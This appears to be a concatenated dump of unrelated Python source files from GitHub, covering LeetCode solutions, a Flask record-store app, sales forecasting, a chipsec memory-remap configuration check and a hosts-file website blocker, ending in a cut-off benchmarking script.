= False\n\n\nclass Solution5:\n def cleanRoom(self, robot):\n DIRS = [[-1, 0], [0, 1], [1, 0], [0, -1]] # facing up, turning right as index increases\n visited = set()\n\n def dfs(robot, coord, dindex):\n visited.add(coord)\n robot.clean()\n last_move = True\n\n for di in [3, 0, 1, 2]:\n if last_move: # always try turning left first, then right\n robot.turnLeft()\n else:\n robot.turnRight()\n d = DIRS[(dindex + di) % 4] # adjust the direction\n new_c = (coord[0] + d[0], coord[1] + d[1]) # position of the next step\n\n if new_c not in visited and robot.move(): # check whether we can move forward\n dfs(robot, new_c, (dindex + di) % 4) # move forward\n robot.move() # come back - key point: every forward move needs a matching move back, retracing the path\n last_move = True # keep trying to turn left on the next step\n else: # the cell was already visited or is blocked\n last_move = False # turn right on the next step\n\n dfs(robot, (0, 0), 0)\n\nclass Solution:\n def cleanRoom(self, robot):\n \"\"\"\n :type robot: Robot\n :rtype: None\n \"\"\"\n dfs(robot, (0, 0), 0, set())\n\n\n# left, up, right, down\nDIR = ((0, -1), (-1, 0), (0, 1), (1, 0))\n\n\nclass Solution6:\n def cleanRoom(self, robot):\n \"\"\"\n :type robot: Robot\n :rtype: None\n \"\"\"\n # assume we start at (0, 0) the origin\n self.dfs(robot, (0, 0), set(), 1)\n\n def dfs(self, robot, curr_pos, visited, facing_direction):\n robot.clean()\n visited.add(curr_pos)\n\n for i in range(4):\n robot.turnLeft()\n # for i in [0, 3], i+1 means how many times we have turned left\n # (facing_direction - (i + 1)) % 4 therefore, is our new facing direction\n new_direction = (facing_direction - i - 1) % 4\n new_pos = (curr_pos[0] + DIR[new_direction][0], curr_pos[1] + DIR[new_direction][1])\n if new_pos not in visited and robot.move():\n self.dfs(robot=robot,\n curr_pos=new_pos,\n visited=visited,\n facing_direction=new_direction)\n # turn around\n robot.turnLeft()\n robot.turnLeft()\n # move back\n robot.move()\n # face the previous direction, such that we can continue turning left\n robot.turnLeft()\n 
robot.turnLeft()\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Taoge123/OptimizedLeetcode","sub_path":"LeetcodeNew/DFS/LC_489_Robot_Room_Cleaner.py","file_name":"LC_489_Robot_Room_Cleaner.py","file_ext":"py","file_size_in_byte":4480,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"15156237694","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\n\ndef gen_callgraph(callgraph_file):\n callgraph = {}\n for line in callgraph_file.readlines():\n fields = line.split(':')\n caller = int(fields[0])\n callees_strs = fields[1].split(',')\n callees = set(map(lambda item: int(item), callees_strs[:-1]))\n callgraph[caller] = callees\n return callgraph \n\n\ndef gen_funcIdCost(funcIdCost_file):\n funcIdCost = {}\n for line in funcIdCost_file.readlines():\n fields = line.split(',')\n funcId = int(fields[0])\n cost = int(fields[1])\n funcIdCost[funcId] = cost\n return funcIdCost\n\n\ndef gen_most_complexity(comp_file):\n comp_99_func_ids = set()\n comp_2_func_ids = set()\n comp_1_func_ids = set()\n for line in comp_file.readlines():\n fields = line.split(',')\n try:\n func_id = int(fields[0])\n except:\n continue\n comp = int(fields[1])\n if comp == 99:\n comp_99_func_ids.add(func_id)\n if comp == 2:\n comp_2_func_ids.add(func_id)\n if comp == 1:\n comp_1_func_ids.add(func_id)\n if len(comp_99_func_ids) > 10:\n print(\"2^N\")\n return comp_99_func_ids\n elif len(comp_2_func_ids) > 0:\n print(\"N^2\")\n return comp_2_func_ids\n else:\n print(\"N\")\n return comp_1_func_ids\n\n\ndef gen_full_callgraph(callgraph):\n full_callgraph = {}\n for caller, callees in callgraph.items():\n worklist = []\n visited = set()\n for callee in callees:\n worklist.append(callee)\n while len(worklist) > 0:\n curr = worklist.pop()\n if curr in full_callgraph:\n for curr_full_callee in full_callgraph[curr]:\n visited.add(curr_full_callee)\n continue\n if curr not in callgraph:\n continue\n for curr_callee in callgraph[curr]:\n if curr_callee not in visited:\n worklist.append(curr_callee)\n visited.add(curr_callee)\n full_callgraph[caller] = visited\n return full_callgraph\n\n\ndef insert_sort(arr, full_callgraph):\n n = len(arr)\n new_arr = []\n new_arr.append(arr[0])\n\n for i in range(1, n):\n j = 0\n insert_flag = False\n while j < len(new_arr):\n if new_arr[j] in full_callgraph \\\n and arr[i] in full_callgraph[new_arr[j]]:\n new_arr.insert(j, arr[i])\n insert_flag = True\n break\n j += 1\n if not insert_flag:\n new_arr.append(arr[i])\n return new_arr\n\n\ndef gen_rank(callgraph, funcIdCost, compFuncIds):\n compFuncIdCost = dict(filter(lambda elem: elem[0] in compFuncIds, funcIdCost.items()))\n compFuncIdSortedByCost = sorted(compFuncIdCost, key=compFuncIdCost.get, reverse=True)\n # for funcId in compFuncIdSortedByCost:\n # print(funcId, compFuncIdCost[funcId])\n full_callgraph = gen_full_callgraph(callgraph)\n #full_callgraph = callgraph\n rank = insert_sort(compFuncIdSortedByCost, full_callgraph)\n for funcId in rank:\n print(funcId, compFuncIdCost[funcId])\n #lower_bound = compFuncIdCost[rank[1]] * 0.5\n #top_rank = []\n #split_idx = 0\n #for idx, funcId in enumerate(rank):\n # if compFuncIdCost[funcId] < lower_bound:\n # split_idx = idx\n # break\n # top_rank.append(funcId)\n\n ## print(\"top rank:\")\n ## for funcId in top_rank:\n ## print(funcId, compFuncIdCost[funcId])\n #new_top_rank = sorted(top_rank, key=compFuncIdCost.get)\n ## print(\"rank:\")\n #for funcId in new_top_rank:\n # print(funcId, compFuncIdCost[funcId])\n #for funcId in 
rank[split_idx:]:\n # print(funcId, compFuncIdCost[funcId])\n\ndef main():\n complexity_file_path = sys.argv[1]\n with open(\"callgraph.log\") as infile:\n callgraph = gen_callgraph(infile)\n with open(\"funcIdCost.log\") as infile:\n funcIdCost = gen_funcIdCost(infile)\n with open(complexity_file_path) as infile:\n compFuncIds = gen_most_complexity(infile)\n gen_rank(callgraph, funcIdCost, compFuncIds)\n\n\nif __name__ == \"__main__\":\n main()\n \n","repo_name":"ComAirProject/ComAir","sub_path":"Code/scripts/ranking/gen_rank.py","file_name":"gen_rank.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"72797633322","text":"from sklearn.svm import LinearSVC\nfrom collections import OrderedDict\nfrom operator import itemgetter\nfrom evaluation import compute_wss\n\ndef prioritise_and_evaluate(X_train,\n y_train,\n X_test,\n y_test):\n \"\"\"\n Trains an L2-regularised linear SVM classifier.\n Documents in the test subset, i.e. X_test, are ranked according to the signed-margin distance between the document feature vectors and the SVM hyperplane.\n :param X_train: Training documents\n :param y_train: Training labels\n :param X_test: Test documents\n :param y_test: Test labels\n :return: work saved over sampling at 95%recall (wss_95) and 100%recall (wss_100)\n \"\"\"\n # define SVM Classifier\n linear_svc = LinearSVC(loss='squared_hinge', penalty='l2',\n dual=False, tol=1e-3, class_weight='balanced', C=0.000001)\n # train SVM classifier\n linear_svc.fit(X_train, y_train)\n\n # get predictions of test documents\n predictions = linear_svc.predict(X_test)\n\n # get distances between test documents and the SVM hyperplane.\n distances = linear_svc.decision_function(X_test)\n test_indexes_with_distances = {}\n for index, prediction in enumerate(predictions):\n test_indexes_with_distances[index] = distances[index]\n\n # order documents in a descending order of their distance to the SVM hyperplane\n test_indexes_with_distances = OrderedDict(\n sorted(test_indexes_with_distances.items(), key=itemgetter(1), reverse=True))\n\n\n # evaluate ranking in terms of work saved over 95% and 100% recall\n wss_95, wss_100 = compute_wss(indexes_with_predicted_distances=test_indexes_with_distances,\n y_test=y_test)\n return wss_95, wss_100","repo_name":"gkontonatsios/DAE-FF","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"1588219492","text":"\nimport sys, os, logging, PyQt4\nfrom logging import debug, info, warning, error, critical\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\n# --------------------------------------\n\nclass Config(dict):\n \n def __init__(self, rootdir):\n self.initDefaultKeys()\n self.loadAllKeys()\n if (not rootdir is None) and os.path.isdir(rootdir):\n self[\"rootdirectory\"] = rootdir\n debug(\"arg rootdirectory: %s\" % rootdir)\n return\n\n def __getattr__(self, key):\n return self[key]\n def __setattr__(self, key, value):\n self[key]=value\n\n def initDefaultKeys(self):\n info(\"Initializing default keys\")\n defaults = ( ( \"rootdirectory\", \"~/\" ),\n ( \"window/xpos\", \"0\" ),\n ( \"window/ypos\", \"0\" ),\n ( \"window/xsize\", \"250\" ),\n ( \"window/ysize\", \"150\" ) )\n for i in defaults:\n self[ i[0] ] = i[1]\n debug(\"[%s]=%s\"%(i[0], self[i[0]]))\n # default handlers\n self.handlers = [ 
[\"*.nes\",\"fceu\"] ]\n return\n\n def loadAllKeys(self):\n settings = QSettings()\n info(\"Loading keys from config file: %s\" % settings.fileName())\n settings.sync()\n keys = settings.allKeys()\n for i in keys:\n s = str(i)\n if s.find(\"handlers\") >= 0: continue # skip handlers\n self[s] = settings.value(i).toString()\n debug(\"[%s]=%s\"%(s, self[s]))\n self.loadHandlers(settings)\n return\n\n def loadHandlers(self, settings):\n h = []\n n = settings.beginReadArray(\"handlers\");\n if n == 0: return\n info(\"Loading %i handlers\" % n)\n for i in xrange(0, n):\n settings.setArrayIndex(i);\n glob = str(settings.value(\"glob\").toString())\n launcher = str(settings.value(\"launcher\").toString())\n h.append( [glob, launcher] )\n debug(\"[handlers][%i] = glob:%s : launcher:%s\" % (i, h[i][0], h[i][1]) )\n self.handlers = h\n settings.endArray()\n return\n\n def saveAllKeys(self):\n settings = QSettings()\n info(\"Saving keys to config file: %s\" % settings.fileName())\n for i in self:\n s = str(self[i])\n if i == \"handlers\": continue # skip handlers\n settings.setValue(i, s)\n debug(\"[%s]=%s\"%(i, s))\n self.saveHandlers(settings)\n settings.sync()\n return\n\n def saveHandlers(self, settings):\n h = self.handlers\n if len(h) == 0: return\n info(\"Saving %i handlers\" % len(h))\n settings.beginWriteArray(\"handlers\", len(h))\n for i in xrange(0, len(h)):\n settings.setArrayIndex(i)\n settings.setValue(\"glob\", h[i][0])\n settings.setValue(\"launcher\", h[i][1])\n debug(\"[handlers][%i] = glob:%s : launcher:%s\" % (i, h[i][0], h[i][1]) )\n settings.endArray()\n return\n\n","repo_name":"inmatarian/qhtpicker","sub_path":"qhtpicker/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"11689427560","text":"from flask import render_template, request, redirect\nfrom flask import Blueprint\nfrom models.album import Album\nimport repositories.album_repository as album_repository\nimport repositories.artist_repository as artist_repository\n\nalbums_blueprint = Blueprint(\"albums\", __name__)\n\n@albums_blueprint.route(\"/\")\ndef homepage():\n albums = album_repository.select_all()\n total_albums_in_stock = album_repository.total_albums_in_stock(albums)\n total_spend_on_stock = album_repository.total_spend_on_stock(albums)\n stock_alerts = False\n for album in albums:\n if album.stock_qty <= 3:\n stock_alerts = True\n break\n return render_template(\"/index.html\", albums = albums, total_albums_in_stock = total_albums_in_stock, total_spend_on_stock = total_spend_on_stock, stock_alerts = stock_alerts)\n\n@albums_blueprint.route(\"/albums\")\ndef albums():\n albums = album_repository.select_all()\n return render_template(\"albums/index.html\", albums = albums)\n\n@albums_blueprint.route(\"/albums/new\")\ndef new_album():\n artists = artist_repository.select_all()\n return render_template(\"/albums/new.html\", artists = artists)\n\n@albums_blueprint.route(\"/albums\", methods=[\"POST\"])\ndef create_album():\n artist = artist_repository.select(request.form[\"artist.id\"])\n title = request.form[\"title\"]\n year_released = request.form[\"year_released\"]\n genre = request.form[\"genre\"]\n stock_qty = int(request.form[\"stock_qty\"])\n purchase_price = float(request.form[\"purchase_price\"])\n sell_price = float(request.form[\"sell_price\"])\n album = Album(artist, title, year_released, genre, stock_qty, purchase_price, sell_price)\n album_repository.save(album)\n 
return redirect(\"/albums\")\n\n@albums_blueprint.route(\"/albums/\", methods = [\"GET\"])\ndef show_album(id):\n album = album_repository.select(id)\n return render_template(\"albums/album.html\", album = album)\n\n@albums_blueprint.route(\"/albums//edit\")\ndef edit_album(id):\n album = album_repository.select(id)\n artists = artist_repository.select_all()\n return render_template(\"albums/edit.html\", album = album, artists = artists)\n\n@albums_blueprint.route(\"/albums/\", methods=[\"POST\"])\ndef update_album(id):\n artist = artist_repository.select(request.form[\"artist.id\"])\n title = request.form[\"title\"]\n year_released = request.form[\"year_released\"]\n genre = request.form[\"genre\"]\n stock_qty = int(request.form[\"stock_qty\"])\n purchase_price = float(request.form[\"purchase_price\"])\n sell_price = float(request.form[\"sell_price\"])\n album = Album(artist, title, year_released, genre, stock_qty, purchase_price, sell_price, id)\n album_repository.update(album)\n return redirect(\"/albums\")\n\n@albums_blueprint.route(\"/albums//delete\", methods=[\"POST\"])\ndef delete_album(id):\n album_repository.delete(id)\n return redirect (\"/albums\")\n","repo_name":"LaurenLingham/record_store","sub_path":"controllers/album_controller.py","file_name":"album_controller.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"2179231150","text":"import bingo_add\npeople=100\nsum=0\nfor i in range(1000):\n\tsum+=bingo_add.bingo(people)\n\nstring_num=str((sum/1000.0))\n\nprint (\"Meso oros arithmon mexri to BINGO :\")+string_num\n\n","repo_name":"milosmatic1513/Python-Projects","sub_path":"bingo_ergasia1/bingo.py","file_name":"bingo.py","file_ext":"py","file_size_in_byte":175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32440450784","text":"from django.test import TestCase\nimport pytest\nfrom .serializers import ProfileSerializer\nfrom .models import Profile\nimport logging\n\n@pytest.mark.django_db\ndef test_profile_serializer():\n # Create a test profile object\n profile = Profile.objects.create(\n name='John Doe',\n bio='Test bio',\n skills='Test skills',\n work_experience='Test work experience',\n hobbies='Test hobbies'\n )\n\n # Serialize the profile object\n serializer = ProfileSerializer(instance=profile)\n logging.info('This is an serializer ', serializer)\n # Ensure the serialized data matches the expected values\n assert serializer.data['name'] == 'John Doe'\n assert serializer.data['bio'] == 'Test bio'\n assert serializer.data['skills'] == 'Test skills'\n assert serializer.data['work_experience'] == 'Test work experience'\n assert serializer.data['hobbies'] == 'Test hobbies'\n\n","repo_name":"raghulvuedata/djangoPortfolio","sub_path":"portfolio/profiles/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70388977323","text":"from prettytable import PrettyTable\r\n\r\n#with open(\"C:\\\\Users\\\\USER\\\\error_message.csv\",\"r\")as csvfile:\r\n #csvf=csvfile.readlines()\r\n #lines=csvf[0]\r\n #newline=lines.split(\",\")\r\n #s=PrettyTable([newline[0],newline[1]])\r\n #for r in range(1,len(csvf)):\r\n #rr=csvf[r].split(\",\")\r\n #s.add_row([rr[0],rr[1]])\r\n #html_code=s.get_html_string()\r\n #html_file=open(\"C:\\\\Users\\\\USER\\\\html_script.html\",\"w\")\r\n 
#html_file=html_file.write(html_code)\r\n\r\n\r\nwith open(\"C:\\\\Users\\\\USER\\\\user_statistics.csv\",\"r\") as usercsv:\r\n us=usercsv.readlines()\r\n line=us[0]\r\n lines=line.split(\",\")\r\n D=PrettyTable([lines[0] ,lines[1] ,lines[2]])\r\n for e in range(1,len(us)):\r\n new=us[e].split(\",\")\r\n D.add_row([new[0],new[1],new[2]])\r\n stats_html_code=D.get_html_string()\r\n stats_file=open(\"C:\\\\Users\\\\USER\\\\user_statistics.html\",\"w\")\r\n stats_file=stats_file.write(stats_html_code)","repo_name":"EmperorDa8/random-scripts","sub_path":"csv to html.py","file_name":"csv to html.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"72191022124","text":"import pandas as pd\nfrom fbprophet import Prophet\nimport numpy as np\nimport pyodbc\nimport os\n\n\ndef forecasting():\n restaurant_id = input('geben sie eine RestaurantID an:')\n name_csv = str(input('geben sie den Namen der Zieldatei an: (z.B. restaurant.csv)'))\n column_date = str(input('Name der Spalte mit dem Datum:'))\n column_product_name = str(input('Name der Spalte mit den Produktnamen:'))\n column_quantity = str(input('Name der Spalte mit der Quantity:'))\n column_sold_products = str(input('Name der Spalte mit der Anzahl der verkauften Produkte:'))\n data_path = \"../data\"\n data = pd.read_csv(os.path.join(data_path, name_csv))\n\n data_ts = data[[column_date, column_product_name, column_quantity, column_sold_products]]\n data_ts = data_ts.dropna()\n\n # change to datetime\n data_ts[column_date] = pd.to_datetime(data_ts[column_date])\n data_ts[column_date] = pd.to_datetime(data_ts[column_date], format='%Y%m%d')\n\n data_grouped = data_ts.groupby([column_product_name])[column_sold_products, column_quantity].sum()\n # data_grouped.tail(100)\n\n # get the top 10 most sold products\n top_ten = data_grouped.sort_values(by=str(column_sold_products), ascending=False).head(10)\n top_ten_list = top_ten.index.tolist()\n\n # connect to Database\n connection_string = (\n 'DRIVER=MySQL ODBC 8.0 ANSI Driver;'\n 'SERVER=localhost;'\n 'DATABASE=restaurant_products;'\n 'UID=root;'\n 'PWD=1234;'\n 'charset=utf8mb4;'\n )\n\n conn = pyodbc.connect(connection_string)\n\n def execute(command):\n cursor = conn.cursor()\n cursor.execute(command)\n cursor.commit()\n\n # inserts the forecasting into the database\n def predict(restaurantID, date, quantity, min_quantity, max_quantity, item):\n command = 'insert into prediction (restaurantId,datum,quantity,max_quantity,min_quantity, product_name) values (\"' + str(\n restaurantID) + '\", \"' + str(date) + '\",' + str(quantity) + ',' + str(min_quantity) + ',' + str(\n max_quantity) + ',\"' + str(item) + '\");'\n # print(command)\n execute(command)\n\n for item in top_ten_list:\n is_item = data_ts[column_product_name] == item\n data_item = data_ts[is_item]\n data_item[column_date] = pd.to_datetime(data_item[column_date].dt.strftime('%Y-%m-%d'))\n data_item_grouped = data_item.groupby([column_date])[column_sold_products].sum()\n date = data_item_grouped.index.tolist()\n df_data_item_grouped = data_item_grouped.to_frame()\n # print(date)\n df_data_item_grouped['Datum'] = date\n # data_item_grouped['Order Date'] = data_item_grouped.index\n df_data_item_grouped.reset_index(drop=True, inplace=True)\n\n df_data_item_grouped.rename(columns={'Datum': 'ds', column_sold_products: 'y'}, inplace=True)\n list = df_data_item_grouped['y']\n df_data_item_grouped.pop('y')\n df_data_item_grouped['y'] = list\n\n m = 
Prophet()\n m.fit(df_data_item_grouped)\n\n future_week = m.make_future_dataframe(periods=7)\n future_week.tail(7)\n\n forecast_week = m.predict(future_week)\n\n print(forecast_week[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].tail(7))\n\n prediction_seven_days_df = forecast_week[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].tail(7)\n\n for index, rows in prediction_seven_days_df.iterrows():\n date = rows['ds']\n quantity = rows['yhat']\n min_quantity = rows['yhat_lower']\n max_quantity = rows['yhat_upper']\n\n predict(restaurant_id, date, quantity, max_quantity, min_quantity, item)\n\n\nforecasting()\n","repo_name":"BennerLukas/takeawaste","sub_path":"test/deprecated/forecasting_function.py","file_name":"forecasting_function.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"2085557282","text":"from chipsec.module_common import BaseModule, ModuleResult, MTAG_HWCONFIG, MTAG_SMM\nfrom chipsec.defines import BIT32, ALIGNED_1MB\n\n_MODULE_NAME = 'remap'\n\nTAGS = [MTAG_SMM, MTAG_HWCONFIG]\n\n\n_REMAP_ADDR_MASK = 0x7FFFF00000\n_TOLUD_MASK = 0xFFFFF000\n\n\nclass remap(BaseModule):\n\n def __init__(self):\n BaseModule.__init__(self)\n self.rc_res = ModuleResult(0x43aa254, 'https://chipsec.github.io/modules/chipsec.modules.common.remap.html')\n\n def is_supported(self) -> bool:\n if self.cs.is_core():\n rbase_exist = self.cs.is_register_defined('PCI0.0.0_REMAPBASE')\n rlimit_exist = self.cs.is_register_defined('PCI0.0.0_REMAPLIMIT')\n touud_exist = self.cs.is_register_defined('PCI0.0.0_TOUUD')\n tolud_exist = self.cs.is_register_defined('PCI0.0.0_TOLUD')\n tseg_exist = self.cs.is_register_defined('PCI0.0.0_TSEGMB')\n if rbase_exist and rlimit_exist and touud_exist and tolud_exist and tseg_exist:\n return True\n self.logger.log_important('Required register definitions not defined for platform. Skipping module.')\n else:\n self.logger.log_important('Not a Core (client) platform. 
Skipping module.')\n\n self.rc_res.setStatusBit(self.rc_res.status.NOT_APPLICABLE)\n self.res = self.rc_res.getReturnCode(ModuleResult.NOTAPPLICABLE)\n return False\n\n def is_ibecc_enabled(self) -> bool:\n if self.cs.is_register_defined('IBECC_ACTIVATE'):\n edsr = self.cs.read_register_field('IBECC_ACTIVATE', 'IBECC_EN')\n if edsr == 1:\n return True\n else:\n self.logger.log_verbose('IBECC is not enabled!')\n else:\n self.logger.log_verbose('IBECC is not defined!')\n return False\n\n def check_remap_config(self) -> int:\n is_warning = False\n\n remapbase = self.cs.read_register('PCI0.0.0_REMAPBASE')\n remaplimit = self.cs.read_register('PCI0.0.0_REMAPLIMIT')\n touud = self.cs.read_register('PCI0.0.0_TOUUD')\n tolud = self.cs.read_register('PCI0.0.0_TOLUD')\n tsegmb = self.cs.read_register('PCI0.0.0_TSEGMB')\n self.logger.log(\"[*] Registers:\")\n self.logger.log(f\"[*] TOUUD : 0x{touud:016X}\")\n self.logger.log(f\"[*] REMAPLIMIT: 0x{remaplimit:016X}\")\n self.logger.log(f\"[*] REMAPBASE : 0x{remapbase:016X}\")\n self.logger.log(f\"[*] TOLUD : 0x{tolud:08X}\")\n self.logger.log(f\"[*] TSEGMB : 0x{tsegmb:08X}\")\n self.logger.log(\"\")\n\n ia_untrusted = 0\n if self.cs.register_has_field('MSR_BIOS_DONE', 'IA_UNTRUSTED'):\n ia_untrusted = self.cs.read_register_field('MSR_BIOS_DONE', 'IA_UNTRUSTED')\n remapbase_lock = remapbase & 0x1\n remaplimit_lock = remaplimit & 0x1\n touud_lock = touud & 0x1\n tolud_lock = tolud & 0x1\n remapbase &= _REMAP_ADDR_MASK\n remaplimit &= _REMAP_ADDR_MASK\n touud &= _REMAP_ADDR_MASK\n tolud &= _TOLUD_MASK\n tsegmb &= _TOLUD_MASK\n self.logger.log(\"[*] Memory Map:\")\n self.logger.log(f\"[*] Top Of Upper Memory: 0x{touud:016X}\")\n self.logger.log(f\"[*] Remap Limit Address: 0x{(remaplimit | 0xFFFFF):016X}\")\n self.logger.log(f\"[*] Remap Base Address : 0x{remapbase:016X}\")\n self.logger.log(f\"[*] 4GB : 0x{BIT32:016X}\")\n self.logger.log(f\"[*] Top Of Low Memory : 0x{tolud:016X}\")\n self.logger.log(f\"[*] TSEG (SMRAM) Base : 0x{tsegmb:016X}\")\n self.logger.log('')\n\n remap_ok = True\n\n self.logger.log(\"[*] Checking memory remap configuration..\")\n\n if remapbase == remaplimit:\n self.logger.log(\"[!] 
Memory Remap status is Unknown\")\n is_warning = True\n elif remapbase > remaplimit:\n self.logger.log(\"[*] Memory Remap is disabled\")\n else:\n self.logger.log(\"[*] Memory Remap is enabled\")\n remaplimit_addr = (remaplimit | 0xFFFFF)\n if self.is_ibecc_enabled():\n ok = (remaplimit_addr > touud) and (remapbase < touud)\n else:\n ok = ((remaplimit_addr + 1) == touud)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" Remap window configuration is correct: REMAPBASE <= REMAPLIMIT < TOUUD\")\n else:\n self.logger.log_bad(\" Remap window configuration is not correct\")\n\n ok = (0 == tolud & ALIGNED_1MB) and \\\n (0 == touud & ALIGNED_1MB) and \\\n (0 == remapbase & ALIGNED_1MB) and \\\n (0 == remaplimit & ALIGNED_1MB)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" All addresses are 1MB aligned\")\n else:\n self.logger.log_bad(\" Not all addresses are 1MB aligned\")\n\n self.logger.log(\"[*] Checking if memory remap configuration is locked..\")\n ok = (0 != touud_lock) or (0 != ia_untrusted)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" TOUUD is locked\")\n else:\n self.logger.log_bad(\" TOUUD is not locked\")\n\n ok = (0 != tolud_lock) or (0 != ia_untrusted)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" TOLUD is locked\")\n else:\n self.logger.log_bad(\" TOLUD is not locked\")\n\n ok = ((0 != remapbase_lock) and (0 != remaplimit_lock)) or (0 != ia_untrusted)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" REMAPBASE and REMAPLIMIT are locked\")\n else:\n self.logger.log_bad(\" REMAPBASE and REMAPLIMIT are not locked\")\n\n if remap_ok:\n if is_warning:\n self.logger.log_warning(\"Most Memory Remap registers are configured correctly and locked\")\n self.logger.log(\"[!] Manual verification of REMAP BASE and LIMIT register values may be needed.\")\n res = ModuleResult.WARNING\n self.rc_res.setStatusBit(self.rc_res.status.VERIFY)\n else:\n res = ModuleResult.PASSED\n self.rc_res.setStatusBit(self.rc_res.status.SUCCESS)\n self.logger.log_passed(\"Memory Remap is configured correctly and locked\")\n else:\n res = ModuleResult.FAILED\n self.rc_res.setStatusBit(self.rc_res.status.CONFIGURATION)\n self.rc_res.setStatusBit(self.rc_res.status.LOCKS)\n self.logger.log_failed(\"Memory Remap is not properly configured/locked. 
Remapping attack may be possible\")\n\n return self.rc_res.getReturnCode(res)\n\n\n # --------------------------------------------------------------------------\n # run( module_argv )\n # Required function: run here all tests from this module\n # --------------------------------------------------------------------------\n def run(self, _) -> int:\n self.logger.start_test(\"Memory Remapping Configuration\")\n\n self.res = self.check_remap_config()\n return self.res\n","repo_name":"chipsec/chipsec","sub_path":"chipsec/modules/common/remap.py","file_name":"remap.py","file_ext":"py","file_size_in_byte":7083,"program_lang":"python","lang":"en","doc_type":"code","stars":2755,"dataset":"github-code","pt":"19"} +{"seq_id":"43580235744","text":"class BitmapFile:\n def __init__(self, data):\n self.size = self.sumBytes(data[2:6])\n self.start = self.sumBytes(data[10:14])\n self.width = self.sumBytes(data[18:22])\n self.height = self.sumBytes(data[22:26])\n self.depth = self.sumBytes(data[28:30])\n self.bpp = self.depth // 8\n #self.head = data[0:self.start]\n #self.data = data[self.start:self.size]\n self.data = data\n\n def sumBytes(self, d):\n byteSum = 0\n for i in range(len(d)):\n byteSum += (\n (d[i] % 16) * 16**(i*2) +\n (d[i] // 16) * 16**(i*2 + 1)\n )\n return byteSum\n\n def makeFile(self, filePath):\n with open(filePath, \"wb\") as f:\n f.write(self.data)\n\n def findPixelIndex(self, x, y):\n return self.start + x * self.bpp + y * self.width * self.bpp\n","repo_name":"borkess/afis","sub_path":"BitmapFile.py","file_name":"BitmapFile.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31300617090","text":"import time\nfrom datetime import datetime as dt\n\nhosts_path = r\"C:\\Users\\Vishnu's World\\Desktop\\app3\\hosts\"\nredirect = \"127.0.0.1\"\nwebsite_list = [\"www.facebook.com\",\"facebook.com\",\"www.flipkart.com\",\"www.amazon.in\"]\n\nwhile True:\n if dt(dt.now().year,dt.now().month,dt.now().day,9)>dt.now()>=dt(dt.now().year,dt.now().month,dt.now().day,3):\n print (\"College...\")\n with open(hosts_path,'r+')as file:\n content = file.read()\n for website in website_list:\n if website in content:\n pass\n else:\n file.write(redirect+\" \"+website+\"\\n\")\n else:\n with open(hosts_path,'r+') as file:\n content = file.readlines()\n file.seek(0)\n for line in content:\n if not any(website in line for website in website_list):\n file.write(line)\n file.truncate()\n print (\"study...\")\n time.sleep (5)\n","repo_name":"vishnuvryeruva/Website-Blocker","sub_path":"Website_blocker.pyw","file_name":"Website_blocker.pyw","file_ext":"pyw","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2485307424","text":"import time\nimport matplotlib.pyplot as plt\nfrom typing import Callable\n\nfrom myio import getRandomMatrix\n\n\ndef benchmark(mul_func: Callable, sizes: list) -> list:\n res_times = []\n temp_times = []\n const_measures = 2\n\n for i in range(len(sizes)):\n left_matrix = getRandomMatrix(sizes[i], sizes[i])\n right_matrix = getRandomMatrix(sizes[i], sizes[i])\n for j in range(const_measures):\n start_time = time.time()\n mul_func(left_matrix, right_matrix)\n end_time = time.time() - start_time\n\n temp_times.append(end_time)\n\n res_times.append(sum(temp_times) / const_measures)\n temp_times.clear()\n\n print(res_times)\n\n return res_times\n\n\ndef plot_graph(mul_funcs: list, sizes: list) -> None:\n # General 
